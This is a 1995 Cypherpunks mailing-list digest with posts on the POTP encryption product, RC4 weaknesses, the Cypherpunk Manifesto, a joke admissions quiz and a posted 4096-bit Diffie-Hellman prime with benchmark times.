In-Reply-To: <gate.RXLDeD1w165w@left.webcasters.com>
Message-ID: <Pine.BSD.3.91.951111001407.24482H-100000@ahcbsd1.ovnet.com>


 
 
Friend, 
 
 
On 11 10 95 jgrubs at left.webcasters.com inquired about POTP 
security: 
 
 What level of security does this cute, little puppy provide??? 
 
 
One approach to answering that inquiry is an excerpt from: 
 
 Date: Sat, 21 OCT 95 10:58:51 -0500 
 From: Paul Jackman <jacktech at delphi.com>
 Newgroups: talk.politics.crypto
 Subject: Re: Elementrix One-Time Pad 

 
 ...mine [Jackman's background and experience] goes back to 1961 
 as Crypto Communications Control Command Center Supervisor for 
 the National Security Agency (NSA), and US Army Inteligence Se- 
 curity.  Even so, I do not consider myself expert in either the 
 technical sense or the historical sense.  But, I know enough not 
 to comment on algorithms that I don't have access to.
 
 The algorithm will be published when patent protection is assured.
 It is currently patent pending in several countries.
 
 As far as marketing goes, this product is not going to disapear.
 We have been premarketing security technology for four years through
 beta, and one year in pilot with international Fortune 100 companies.
 The initial presentations on Internet about a year ago showed us that
 the the newness and complexity of the Algorithm had to be presented
 one on on one to the experts which Elementrix has done.  There is a 
 long parade of companies that have implimented this technology but 
 do not wish to be named, (Typical of any security implementation. 
 Those who do aknowledge the integity of the products are noteworthy, 
 Allen Brill Kroll Assoc., Al Decker Coopers & Lybrand, Todd Sun Mer- 
 gent, and there will be many more.
 
 Paul Jackman
 
 
I silently corrected capitalization and spelling in the above ex- 
cerpt. 
 
I do not understand the import of the expression "expert in either 
the technical sense or the historical sense." 
 
 
Cordially, 
 
Jim 
 








From jlasser at rwd.goucher.edu  Mon Nov 13 14:47:52 1995
From: jlasser at rwd.goucher.edu (Jon Lasser)
Date: Tue, 14 Nov 1995 06:47:52 +0800
Subject: Hakim Bey mention of gvm't crypto policy
Message-ID: <Pine.SUN.3.91.951113164643.9263A-100000@rwd.goucher.edu>


This is a very brief excerpt from a Hakim Bey piece available at 
http://www.t0.or.at/hakimbey/boundary.htm, dealing with... well... lots 
of stuff, actually. Including stuff talked about on the list. I recommend 
the entire piece highly.

Jon

             --------------------------------------------

Knowledge itself can be seen as a kind of virus. On the psychological
level this perception manifested recently as a panic about "computer
viruses", and more generally about computer hacking -- boundary violations
in cyberspace, so to speak. The government wants access to all computer
cypher-codes in order to control the "Net", the InterNet, which might
otherwise spread everywhere, transmitting secrets, even secrets about
"abuse" and kiddy porn -- as if the Net were a disease, rather than simply
a free exchange of information. America's immune system can't take "too
much knowing" (or whatever T.S. Eliot's lame-ass phrase was); America must
be "protected" from penetration by foreign chaos cabals of evil hackers
(who might look just like you and me) -- borders must be imposed. 

            ----------------------------------------------

------------------------------------------------------------------------------
Jon Lasser                <jlasser at rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.






From nobody at REPLAY.COM  Mon Nov 13 15:19:47 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Tue, 14 Nov 1995 07:19:47 +0800
Subject: what's going on
Message-ID: <199511130745.IAA15877@utopia.hacktic.nl>


Privacy is necessary for an open society in the electronic age.
Privacy is not secrecy.  A private matter is something one doesn't
want the whole world to know, but a secret matter is something one
doesn't want anybody to know. Privacy is the power to selectively
reveal oneself to the world.  

If two parties have some sort of dealings, then each has a memory of
their interaction.  Each party can speak about their own memory of
this; how could anyone prevent it?  One could pass laws against it,
but the freedom of speech, even more than privacy, is fundamental to
an open society; we seek not to restrict any speech at all.  If many
parties speak together in the same forum, each can speak to all the
others and aggregate together knowledge about individuals and other
parties.  The power of electronic communications has enabled such
group speech, and it will not go away merely because we might want it
to.

Since we desire privacy, we must ensure that each party to a
transaction have knowledge only of that which is directly necessary
for that transaction.  Since any information can be spoken of, we
must ensure that we reveal as little as possible.  In most cases
personal identity is not salient. When I purchase a magazine at a
store and hand cash to the clerk, there is no need to know who I am. 
When I ask my electronic mail provider to send and receive messages,
my provider need not know to whom I am speaking or what I am saying
or what others are saying to me;  my provider only need know how to
get the message there and how much I owe them in fees.  When my
identity is revealed by the underlying mechanism of the transaction,
I have no privacy.  I cannot here selectively reveal myself; I must
_always_ reveal myself.

Therefore, privacy in an open society requires anonymous transaction
systems.  Until now, cash has been the primary such system.  An
anonymous transaction system is not a secret transaction system.  An
anonymous system empowers individuals to reveal their identity when
desired and only when desired; this is the essence of privacy.

Privacy in an open society also requires cryptography.  If I say
something, I want it heard only by those for whom I intend it.  If 
the content of my speech is available to the world, I have no
privacy.  To encrypt is to indicate the desire for privacy, and to
encrypt with weak cryptography is to indicate not too much desire for
privacy.  Furthermore, to reveal one's identity with assurance when
the default is anonymity requires the cryptographic signature.

We cannot expect governments, corporations, or other large, faceless
organizations to grant us privacy out of their beneficence.  It is to
their advantage to speak of us, and  we should expect that they will
speak.  To try to prevent their speech is to fight against the
realities of information. Information does not just want to be free,
it longs to be free.  Information expands to fill the available
storage space.  Information is Rumor's younger, stronger cousin;
Information is fleeter of foot, has more eyes, knows more, and
understands less than Rumor.

We must defend our own privacy if we expect to have any.  We must
come together and create systems which allow anonymous transactions
to take place.  People have been defending their own privacy for
centuries with whispers, darkness, envelopes, closed doors, secret
handshakes, and couriers.  The technologies of the past did not allow
for strong privacy, but electronic technologies do.

We the Cypherpunks are dedicated to building anonymous systems.  We
are defending our privacy with cryptography, with anonymous mail
forwarding systems, with digital signatures, and with electronic
money.

Cypherpunks write code.  We know that someone has to write software
to defend privacy, and since we can't get privacy unless we all do,
we're going to write it. We publish our code so that our fellow
Cypherpunks may practice and play with it. Our code is free for all
to use, worldwide.  We don't much care if you don't approve of the
software we write.  We know that software can't be destroyed and that
a widely dispersed system can't be shut down. 

Cypherpunks deplore regulations on cryptography, for encryption is
fundamentally a private act.  The act of encryption, in fact, removes
information from the public realm.  Even laws against cryptography
reach only so far as a nation's border and the arm of its violence.
Cryptography will ineluctably spread over the whole globe, and with
it the anonymous transactions systems that it makes possible. 

For privacy to be widespread it must be part of a social contract.
People must come and together deploy these systems for the common
good.  Privacy only extends so far as the cooperation of one's
fellows in society.  We the Cypherpunks seek your questions and your
concerns and hope we may engage you so that we do not deceive
ourselves.  We will not, however, be moved out of our course because
some may disagree with our goals.

The Cypherpunks are actively engaged in making the networks safer for
privacy.  Let us proceed together apace.

Onward.





From nelson at santafe.edu  Mon Nov 13 15:23:56 1995
From: nelson at santafe.edu (Nelson Minar)
Date: Tue, 14 Nov 1995 07:23:56 +0800
Subject: [NOISE] Credit Card security in the New York Times
Message-ID: <9511132213.AA19022@sfi.santafe.edu>


Today's New York Times has a nice article in the business section
about credit card security on the Internet. It's more of an editorial
than an article, but it's an editorial with the (IMNSHO) right spin:
shipping a credit card number over the Internet, even unencrypted, is
no less secure than giving it out over the phone.

The NYT has been doing a nice job covering computer issues in the past
few months, in the Monday's business section. Worth reading if you
want to keep an eye on intelligent media coverage of the net.
-- 
                                __                      
nelson at santafe.edu              \/              http://www.santafe.edu/~nelson/
PGP key 9D719FAD   Fingerprint 3B 9B 8E 58 1C 90 57 3E  B7 99 ED 13 65 2E 0B 24





From rjc at clark.net  Mon Nov 13 15:56:16 1995
From: rjc at clark.net (Ray Cromwell)
Date: Tue, 14 Nov 1995 07:56:16 +0800
Subject: DejaNews all over again
In-Reply-To: <199511112036.MAA24650@jobe.shell.portal.com>
Message-ID: <199511112259.RAA20991@clark.net>


> 
> On Wed, 8 Nov 1995, Jeff Weinstein, self-styled "Electronic Munitions
> Expert", from Netscape Communications: 
> >  Please show us some proof.  All you have done is post unfounded
> >allegations backed up by flawed logic and a misunderstanding of the
> >technology.  Send me a URL, and I will point my navigator at it.  If you
> >can collect my PGP key ring you can gloat here or anywhere else. 
> 
> I think "Jeff" ... Mr. unofficial not speakng for the company Netscape
> spokesperson, I think that you should rethink what you're suggesting. 
> Your tactics won't serve your personal interests on this one.  I really
> would recommend that you come clean.  This is not about "gloating".  I 
> really take very little pleasure in this.


  Jeff, I think it's in your best interest to not waste your time
responding to this moron (who bears many features in common with
Detweiler)

-Ray





From jsw at netscape.com  Mon Nov 13 16:00:34 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Tue, 14 Nov 1995 08:00:34 +0800
Subject: Lotus Notes RSA Implementation Question
In-Reply-To: <9511102035.AA6927@moe.iris.com>
Message-ID: <30A52187.44EB@netscape.com>


Bob Glassley wrote:
> >>2)  Considering RC4 is a proprietary scheme, have there been any
> >>concerted efforts to validate it's strength or lack of?  If so, could
> >>you give a pointer to any documents I could review.
> >>
> >There has been considerable discussion of the security of RC4 on this list, and
> >some subtle (i.e. worrisome but not disasterous) weaknesses have been
> >found. Lotus Notes' use of RC4 is not subject to the weaknesses disclosed
> >to date because it does not encrypt recognizable plaintext with the first few
> >bytes of the RC4 stream.
> 
> My understanding was that the problems exposed with RC4 that you
> mentioned, were with the particular implemenation by Netscape.  I
> guess I better go back to the archive and do some reading. :-)

Some RC4 keys that begin with specific values make it somewhat easier to
guess the first few bytes of the encrypted data.  This is a (probably
minor) weakness of RC4, and is in no way specific to Netscape.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From jcobb at ahcbsd1.ovnet.com  Mon Nov 13 16:04:19 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Tue, 14 Nov 1995 08:04:19 +0800
Subject: FBI Computer Chief
Message-ID: <Pine.BSD.3.91.951109004544.1600D-100000@ahcbsd1.ovnet.com>


 
 
Friend, 
 
 
11 06 95 Computerworld 92 runs this "Briefs" item that 
may be of interest to you: 
 
              FBI names computer chief 
 
Federal Bureau of Investigation Director Louis J. Freeh 
last week announced the appointment of Carolyn G. Morris 
to head the FBI's Information Resource Division, which 
has 2,000 employees and a budget of $200 million. 
 
Morris will oversee all automation matters for the FBI 
and research and development for the new National Crime 
Information Center, a nationwide computerized system for 
law enforcement. 
 
 
Cordially, 
 
Jim 
 
 
 
 
                         NOTE 
 
 
     If you wish to subscribe to Computerworld, call 
 
                    1 800 669 1002 
 





From sameer at c2.org  Mon Nov 13 16:04:22 1995
From: sameer at c2.org (sameer)
Date: Tue, 14 Nov 1995 08:04:22 +0800
Subject: REMINDER: PARTY! Nov. 18th, sponsored by Community ConneXion
Message-ID: <199511090615.WAA14726@infinity.c2.org>


Subject: REMINDER: PARTY! Nov. 18th, sponsored by Community ConneXion

Here's a little reminder:
We're having a party in a little over a week. I hope you can make it.

	Community ConneXion: the Internet Privacy Provider is having a
party! We're partying to celebrate the spread of privacy on the net,
through the increased security of internet products, as well as the
growth of our services. (Many new services and new features on existing
services will likely be announced before the party. Stay tuned.)
	We're inviting all our customers and other potentially
interested parties, which includes you, if you've received this
note. So please join us, and send a copy of this invitation to anyone
else you may know who would be interested in attending.

Where: Icon Byte Bar & Grill
       299 9th Street (at Folsom)
       SF CA 94103
When:  Sat. Nov. 18 1995
       7:00 PM

	This is a good chance to meet and network with the people who
are making privacy on the internet a reality. Find out more about the
HackNetscape and HackMicrosoft contests. Learn about our specialized
web services, found nowhere else but at Community ConneXion. Hear
about the anonymous and psuedonymous servers here and what we're doing
to improve them.
	There will be catered snacks and a no-host bar.





From perry at piermont.com  Mon Nov 13 16:12:16 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 14 Nov 1995 08:12:16 +0800
Subject: POTP Security
In-Reply-To: <gate.RXLDeD1w165w@left.webcasters.com>
Message-ID: <199511111827.NAA23896@jekyll.piermont.com>



jgrubs at left.webcasters.com writes:
> >The first commercially available implementation of our 
> >POTP (Power One Time Pad) encryption algorithm. The package includes 
> >a POTP Secure FTP Client, POTP Secure FTP Server, and POTP FileCrypt - 
> >a stand alone file encryption program.
> 
> What level of security does this cute, little puppy provide???

None whatsoever is my guess.

Perry





From klp at gold.tc.umn.edu  Mon Nov 13 16:13:19 1995
From: klp at gold.tc.umn.edu (Kevin L Prigge)
Date: Tue, 14 Nov 1995 08:13:19 +0800
Subject: Who needs time vaults anyway?
In-Reply-To: <199511110715.AAA21835@nagina.cs.colorado.edu>
Message-ID: <30a4ebe65774002@noc.cis.umn.edu>


According to rumor, Bryce said:
> 
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> I don't really understand the use for "can't be opened until
> Christmas" tricks.  If you don't want anyone to see your info until
> Christmas then just don't give them a copy until then!  If you want
> to prove that you have it but not let them see it until later then
> do timestamping of hashes, zero-knowledge proofs and so forth.
> 
> 
> Can anyone explain what use this theoretical "time-sensitive" crypto
> box would be good for?

An application that I've seen is financial data, more specifically
MBS payment info. There is 100s of megabytes of data, and it was
encrypted so that nobody could use the info before the release
date/time, but the data needed to be transmitted prior to release
because of bandwidth constraints. In this case, it wasn't real
time-release, because the key was manually transmitted to release
the information rather than implement some sort of "do not decrypt
until" scheme.


-- 
Kevin L. Prigge        |"A computer lets you make more mistakes faster 
UofM Central Computing | than any invention in human history--with the 
email: klp at cis.umn.edu | possible exceptions of handguns and tequila."
01001101100010110010111|- Mitch Ratcliffe





From jamesd at echeque.com  Mon Nov 13 16:17:24 1995
From: jamesd at echeque.com (James A. Donald)
Date: Tue, 14 Nov 1995 08:17:24 +0800
Subject: YOU_luz
Message-ID: <199511111824.KAA02105@blob.best.net>


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From perry at piermont.com  Mon Nov 13 16:18:48 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 14 Nov 1995 08:18:48 +0800
Subject: POTP Security
In-Reply-To: <Pine.BSD.3.91.951111001407.24482H-100000@ahcbsd1.ovnet.com>
Message-ID: <199511111833.NAA23915@jekyll.piermont.com>



>  As far as marketing goes, this product is not going to disapear.
>  We have been premarketing security technology for four years through
>  beta, and one year in pilot with international Fortune 100 companies.

They would be smart not to give the names of their clients because
good samaritans might inform them of the quality of their product.

Perry





From perry at piermont.com  Mon Nov 13 16:19:53 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 14 Nov 1995 08:19:53 +0800
Subject: Love Bugs
In-Reply-To: <199511110054.BAA15772@utopia.hacktic.nl>
Message-ID: <199511111814.NAA23863@jekyll.piermont.com>



Anonymous writes:
> The Nov 11 WSJ reports on the scare tactics of security
> consultants in the U.S. and by their co-conspiring
> counterparts -- spies -- abroad:

There is no November 11th WSJ -- the Wall Street Journal is only
published Monday through Friday.

The topic you are covering isn't especially relevant, either.

.pm





From perry at piermont.com  Mon Nov 13 16:21:32 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 14 Nov 1995 08:21:32 +0800
Subject: coding and nnet's
In-Reply-To: <199511102255.OAA10734@netcom16.netcom.com>
Message-ID: <199511111800.NAA23831@jekyll.piermont.com>



Bill Frantz writes:
> At 14:17 11/10/95 -0500, Atp3000 at aol.com wrote:
> >I just resently got interested in coding and cryptography, and I was
> >wondering if you could suggest 3 or 4 papers that adresses the aplication of
> >neural networks in cryptography.
> 
> Perhaps neural nets could be used in an unknown plain text, brute force
> attack to automatically select possible decryptions for human examination. 
> I don't know of any papers on the subject.

I remember seeing a good paper by our own David Wagner on how to do
this without anything more than some ordinary statistics -- no
complicated junk required. David, if you are reading this, could you
comment?

Perry






From anon-remailer at utopia.hacktic.nl  Mon Nov 13 16:57:48 1995
From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 14 Nov 1995 08:57:48 +0800
Subject: Cypherpunks Admissions Test
Message-ID: <199511132350.AAA01105@utopia.hacktic.nl>


Due to the large number of new subscribers, cryptogroupies, journalists, and
conspiracy freaks currently posting to Cypherpunks, it has become necessary
to restrict posting privileges on the list.  If you are contemplating a
post to cypherpunks at toad.com, please take the following test FIRST to
determine if your knowledge of cryptography and cypherpunk methodology is
sufficient to allow your participation.

Simply pick the BEST answer to EACH question.  Scoring information is
provided at the end of the test.

1)  The "Cyphernomicon" is:

	a)  Tim May's >1mb rant on the social and technical possibilities
	    of the general adoption of strong crypto.
	b)  the cypherpunk FAQ.
	d)  the 'bible' of H.P.Lovecraft's Cthulhu Mythos. 
	d)  an ancient codebook once used by Julius Caesar.

2)  N.S.A stands for:

	a)  restricting the spread of strong crypto so they can spy on us
	    and keep their jobs.
	b)  No Such Agency or Not Saying Anything, I forget which.
	c)  the National Security Agency.
	d)  aren't they running the space program or something?

3)  If I wanted to keep my kid sister from reading my love letters, I'd:

	a)  encrypt them all with 128 bit key IDEA, keep them in a hidden
	    directory on an encrypted partition, keep a separate MD5 hash
	    for each one, put a firewall between the disk and the rest
            of my system, and then ...
	b)  use DES, cause it's already on my system.
	c)  use ROT 26 (TWICE as good as ROT 13, right?).
	d)  ite-wray em-thay in-ay ig-pay atin-lay.

4)  A good source of random numbers is:

	a)  radioactive decay interrupting a micro clock with a secure hash.
	b)  random mouse movements.
	c)  the system time, and the PID and PPID.
	d)  the state lottery.

5)  "Mod" stands for:

	a)  modulo.
	b)  "clock" arithmetic.
	c)  a weird kind of math that cypherpunks use to keep newbies
	    confused.
	d)  New, hip, cool.

6)   A "Certificate of Authority" is:

	a)  a type of identification that brings up all sorts of interesting
	    questions about identity, True Names, anonymity, reputations,
	    and how trustworthy electronic communication is in general.
	b)  a way of avoiding 'man in the middle' attacks.
	c)  a way to make six bucks a pop off everybody on the net.
	d)  something the Franklin Mint sends you with your hand-painted
	    limited edition Star Trek dinner plate.
    
7)  If Alice wants to send Bob her credit card number over the Internet,
    she should:

	a)  encrypt the file using at least a 2048 bit key, and transmit
	    it over a secure channel with at least application and IP level
	    encryption and authentication.
	b)  use PGP.
	c)  use a secure web server-client.
	d)  warn him ahead of time that she's going to send it backwards.

8)  If Mallet (RIP) needs to get Alice's password, he should:

	a)  hook five hundred computers together over the Internet and brute
	    force the Unix password system.
	b)  run a dictionary attack on /etc/passwd.
	c)  call her and pretend to be a system administrator.
	d)  copy it off the post-it note on her monitor.

9)  The cypherpunk motto, "Cypherpunks write code", means:

	a)  that cypherpunks are actively involved in spreading strong crypto.
	b)  that cypherpunks write programs, or maybe that they encode stuff.
	c)  that the cypherpunks mailing list is really a conspiracy to take
	    over the world, and the messages are really encoded instructions
	    to the various cells on when and where to strike.
	d)  that I can't understand 9/10ths of the things they post.

10)  On the cypherpunk list, the main medium of exchange is:

	a)  e-cash.
	b)  pgp encrypted mail.
	c)  the flame.
	d)  the T-shirt.

11)  A 'hash' is:

	a)  a function that converts an input string to a fixed size output
	    string.
	b)  a way of generating a 'digital fingerprint' of a file.
	c)  the thingie that the phone company calls a 'pound sign'.
	d)  those strange marks running down the middle of a football field.

12)  The 'munitions' T-shirt is:

	a)  a way to make the government look stupid.
	b)  a possible violation of ITAR.
	c)  a shirt with the RC4 algorithm in perl printed on the front.
	d)  a cool way to pick up intellectual chicks.

13)  ITAR, BTW, is:

	a)  a completely stupid, f*cked up way to try and stop the spread
	    of strong crypto, foisted on the world by the NSA and CIA.
	b)  the government rules restricting the export of munitions, including
	    cryptography.
	c)  the reason that I can get pgp faster from hacktic.nl than MIT.
	d)  Bob the Paver's motto over at Asphalt-R-Us.

14)  Blowfish is:

	a)  Bruce Schneier's new Feistel network symmetric encryption
	    algorithm.
	b)  a possible replacement for DES.
	c)  something I ran into in the PGPfone docs.
	d)  a good way to get food poisoning at a sushi bar.

15)  Steganography is:

	a)  the science of hiding messages in other messages.
	b)  a way of hiding information in a .gif of Cindy Crawford.
	c)  a way of hiding a nude .gif of Cindy Crawford in a fully
	    clothed .gif of Cindy Crawford.
	d)  the art of finding the cheat codes in games for the Stega
	    Genesis videogame machine.

16)  If you see a "MAKE MONEY FAST - HERE'S HOW" message, you should:

	a)  mail-bomb the offending idiot back to the abacus age.
	b)  send him several X-rated complaints via anonymous remailer.
	c)  write a polite but firm e-mail to his ISP.
	d)  forward it to cypherpunks and let the experts deal with it.

17)  A 'prime number' is:

	a)  a number evenly divisible by only one and itself.
	b)  a key component of RSA based public key encryption systems.
	c)  a number with particular properties useful in cryptography.
	d)  the blonde with the low-cut "munitions" tank-top at the local
	    espresso bar.

18)  The biggest problem with Chaum's e-cash is:

	a)  it's patented, and Chaum wants an exorbitant amount for licenses.
	b)  it protects Alice's anonymity, but not Bob's.
	c)  it's too complicated for Joe Sixpack to understand and trust.
	d)  all the free porno on the net will be pay-per-view.

19)  If a company releases a crypto product but refuses to release the
     underlying algorithms in order to protect it from attack, it's called:

	a)  snake oil.
	b)  security by obscurity.
	c)  a power one time pad.
	d)  Windows95. 

20)  A good example of a "nym" is:

	a)  Pr0duct Cypher   
	b)  Batman
	c)  Alice d'nonymous
	d)  the girl on the hotbabes IRC channel who turned out to be a guy.

To score your test, simply give yourself 4 points for each a) response, 
3 points for each b), 2 points for each c), and 1 point for each d).
Now add up your point total.  If your score is:

<20 	CLUE-REPELLANT  Try adding up your score again, and this time take
	off your shoes and socks.

20-39	CLUELESS NEWBIE  Read Tim May's "Cyphernomicon", Bruce Schneier's
	"Applied Cryptography", and the last three months archives of the
	cypherpunks mailing list - then take this test again.

40-59   YOU'RE READY  Go ahead and make your first post.  Of course, your
	ass'll get flamed anyway, but what do you care?  You've DONE your
	homework!

60-79	OLD-TIMER  You've obviously been on the list awhile, so keep on
	trucking!  

80	C'mon, Perry, why are you wasting your time on this crap?

Just e-mail this test, and your score, to:

ldetweiler at tentacles.r.us.org

You should be receiving your Cypherpunks Encoder Ring (tm) via e-mail within
three business days.      	





From eay at mincom.oz.au  Mon Nov 13 17:02:19 1995
From: eay at mincom.oz.au (Eric Young)
Date: Tue, 14 Nov 1995 09:02:19 +0800
Subject: 4096 bit strong prime for Diffle-Hellman
Message-ID: <Pine.SOL.3.91.951114090156.23102A-100000@orb>



A bit of a ramble about Diffle-Hellman parameters.....

Just for anyone interested, I 'found' a suspected 4096 strong prime (p and
(p-1)/2 are prime) for use with Diffie-Hellman, generator of 2.
If any-one wants for testing the primality, please let
me know if it passes.  I'm currently using the Miller-Rabin primality
test with my own bignum library.
I'm just generating some 'default' DH parameter sets for distribution
with the next version of my crypto library (SSLeay), I'll send out Phil
Karn's 1024 and 2048 bit values and this one if other people are happy
with it.

Some quick times (in seconds) for the use of a 4096 bit prime with DH on a
SGI (200mhz R4400).  The RSA operation is PKCS#1 private key encrypt, the
DH operation is a PKCS#3 public/private key generation followed by the
generation of session key, the maths routines are from SSLeay.

modulus     DH     RSA
 512      0.23   0.041
1024      1.71   0.248
2048     12.88   1.702
4096    102.18  13.150

The RSA times as you will notice are about the same speed for twice the DH
bit size.  This is due to the RSA operation being reduced to 2 a^b%m
operation where m has the values of p and q where (p-1)*(q-1) is the RSA
modulus, half the bit size. The DH operation is 2 a^b%m operations,
(generating the 'public key' and then raising by the peer's public key). 
Does any-one know of any tricks to speeding the DH operation up (not
counting implementing a better a^b%m function, I'm going to do this later
when I have time :-).  From what I can see, there is not much that can be
done except perhaps some tricks in the initial g^rand%p, since the
generator is a known value. 

Even if the private DH values are pre-calculated, this will only halve the
time of the DH operation and if this is done it looses the advantage of DH
in that if the private/public pair are 'generated on the fly',
pre-recorded session will not be able to be decoded if the private key is
revealed at a later point in time.  This is the major advantage I can see
of a DH key exchange over the use of an RSA based system so I would 
object to loosing this feature. 

With these times I think that 4096 bit DH is not going to be used for
quite a while :-).

eric

The suspected 4096 bit strong prime.

In C, first byte is most significate (big endian)
unsigned char dh4096_p={
        0xFE,0xEA,0xD1,0x9D,0xBE,0xAF,0x90,0xF6,0x1C,0xFC,0xA1,0x06,
        0x5D,0x69,0xDB,0x08,0x83,0x9A,0x2A,0x2B,0x6A,0xEF,0x24,0x88,
        0xAB,0xD7,0x53,0x1F,0xBB,0x3E,0x46,0x2E,0x7D,0xCE,0xCE,0xFB,
        0xCE,0xDC,0xBB,0xBD,0xF5,0x65,0x49,0xEE,0x95,0x15,0x30,0x56,
        0x81,0x88,0xC3,0xD9,0x72,0x94,0x16,0x6B,0x6A,0xAB,0xA0,0xAA,
        0x5C,0xC8,0x55,0x5F,0x91,0x25,0x50,0x3A,0x18,0x0E,0x90,0x32,
        0x4C,0x7F,0x39,0xC6,0xA3,0x45,0x2F,0x31,0x42,0xEE,0x72,0xAB,
        0x7D,0xFF,0xC7,0x4C,0x52,0x8D,0xB6,0xDA,0x76,0xD9,0xC6,0x44,
        0xF5,0x5D,0x08,0x3E,0x9C,0xDE,0x74,0xF7,0xE7,0x42,0x41,0x3B,
        0x69,0x47,0x66,0x17,0xD2,0x67,0x0F,0x2B,0xF6,0xD5,0x9F,0xFC,
        0xD7,0xC3,0xBD,0xDE,0xED,0x41,0xE2,0xBD,0x2C,0xCD,0xD9,0xE6,
        0x12,0xF1,0x05,0x6C,0xAB,0x88,0xC4,0x41,0xD7,0xF9,0xBA,0x74,
        0x65,0x1E,0xD1,0xA8,0x4D,0x40,0x7A,0x27,0xD7,0x18,0x95,0xF7,
        0x77,0xAB,0x6C,0x77,0x63,0xCC,0x00,0xE6,0xF1,0xC3,0x0B,0x2F,
        0xE7,0x94,0x46,0x92,0x7E,0x74,0xBC,0x73,0xB8,0x43,0x1B,0x53,
        0x01,0x1A,0xF5,0xAD,0x15,0x15,0xE6,0x3D,0xC1,0xDE,0x83,0xCC,
        0x80,0x2E,0xCE,0x7D,0xFC,0x71,0xFB,0xDF,0x17,0x9F,0x8E,0x41,
        0xD7,0xF1,0xB4,0x3E,0xBA,0x75,0xD5,0xA9,0xC3,0xB1,0x1D,0x4F,
        0x1B,0x0B,0x5A,0x09,0x88,0xA9,0xAA,0xCB,0xCC,0xC1,0x05,0x12,
        0x26,0xDC,0x84,0x10,0xE4,0x16,0x93,0xEC,0x85,0x91,0xE3,0x1E,
        0xE2,0xF5,0xAF,0xDF,0xAE,0xDE,0x12,0x2D,0x12,0x77,0xFC,0x27,
        0x0B,0xE4,0xD2,0x5C,0x11,0x37,0xA5,0x8B,0xE9,0x61,0xEA,0xC9,
        0xF2,0x7D,0x4C,0x71,0xE2,0x39,0x19,0x04,0xDD,0x6A,0xB2,0x7B,
        0xEC,0xE5,0xBD,0x6C,0x64,0xC7,0x9B,0x14,0x6C,0x2D,0x20,0x8C,
        0xD6,0x3A,0x4B,0x74,0xF8,0xDA,0xE6,0x38,0xDB,0xE2,0xC8,0x80,
        0x6B,0xA1,0x07,0x73,0x8A,0x8D,0xF5,0xCF,0xE2,0x14,0xA4,0xB7,
        0x3D,0x03,0xC9,0x12,0x75,0xFB,0xA5,0x72,0x81,0x46,0xCE,0x5F,
        0xEC,0x01,0x77,0x5B,0x74,0x48,0x1A,0xDF,0x86,0xF4,0x85,0x4D,
        0x65,0xF5,0xDA,0x4B,0xB6,0x7F,0x88,0x2A,0x60,0xCE,0x0B,0xCA,
        0x0A,0xCD,0x15,0x7A,0xA3,0x77,0xF1,0x0B,0x09,0x1A,0xD0,0xB5,
        0x68,0x89,0x30,0x39,0xEC,0xA3,0x3C,0xDC,0xB6,0x1B,0xA8,0xC9,
        0xE3,0x2A,0x87,0xA2,0xF5,0xD8,0xB7,0xFD,0x26,0x73,0x4D,0x2F,
        0x09,0x67,0x92,0x35,0x2D,0x70,0xAD,0xE9,0xF4,0xA5,0x1D,0x84,
        0x88,0xBC,0x57,0xD3,0x2A,0x63,0x8E,0x0B,0x14,0xD6,0x69,0x3F,
        0x67,0x76,0xFF,0xFB,0x35,0x5F,0xED,0xF6,0x52,0x20,0x1F,0xA7,
        0x0C,0xB8,0xDB,0x34,0xFB,0x54,0x94,0x90,0x95,0x1A,0x70,0x1E,
        0x04,0xAD,0x49,0xD6,0x71,0xB7,0x4D,0x08,0x9C,0xAA,0x8C,0x0E,
        0x5E,0x83,0x3A,0x21,0x29,0x1D,0x69,0x78,0xF9,0x18,0xF2,0x5D,
        0x5C,0x76,0x9B,0xDB,0xE4,0xBB,0x72,0xA8,0x4A,0x1A,0xFE,0x6A,
        0x0B,0xBA,0xD1,0x8D,0x3E,0xAC,0xC7,0xB4,0x54,0xAF,0x40,0x8D,
        0x4F,0x1C,0xCB,0x23,0xB9,0xAE,0x57,0x6F,0xDA,0xE2,0xD1,0xA6,
        0x8F,0x43,0xD2,0x75,0x74,0x1D,0xB1,0x9E,0xED,0xC3,0xB8,0x1B,
        0x5E,0x56,0x96,0x4F,0x5F,0x8C,0x33,0x63,
        };
unsigned char dh4096_g={
        0x02,
        };

Or as a ASN.1 encoded pkcs#3 object.

-----BEGIN DH PARAMETERS-----
MIICCAKCAgEA/urRnb6vkPYc/KEGXWnbCIOaKitq7ySIq9dTH7s+Ri59zs77zty7
vfVlSe6VFTBWgYjD2XKUFmtqq6CqXMhVX5ElUDoYDpAyTH85xqNFLzFC7nKrff/H
TFKNttp22cZE9V0IPpzedPfnQkE7aUdmF9JnDyv21Z/818O93u1B4r0szdnmEvEF
bKuIxEHX+bp0ZR7RqE1AeifXGJX3d6tsd2PMAObxwwsv55RGkn50vHO4QxtTARr1
rRUV5j3B3oPMgC7Offxx+98Xn45B1/G0Prp11anDsR1PGwtaCYipqsvMwQUSJtyE
EOQWk+yFkeMe4vWv367eEi0Sd/wnC+TSXBE3pYvpYerJ8n1MceI5GQTdarJ77OW9
bGTHmxRsLSCM1jpLdPja5jjb4siAa6EHc4qN9c/iFKS3PQPJEnX7pXKBRs5f7AF3
W3RIGt+G9IVNZfXaS7Z/iCpgzgvKCs0VeqN38QsJGtC1aIkwOeyjPNy2G6jJ4yqH
ovXYt/0mc00vCWeSNS1wren0pR2EiLxX0ypjjgsU1mk/Z3b/+zVf7fZSIB+nDLjb
NPtUlJCVGnAeBK1J1nG3TQicqowOXoM6ISkdaXj5GPJdXHab2+S7cqhKGv5qC7rR
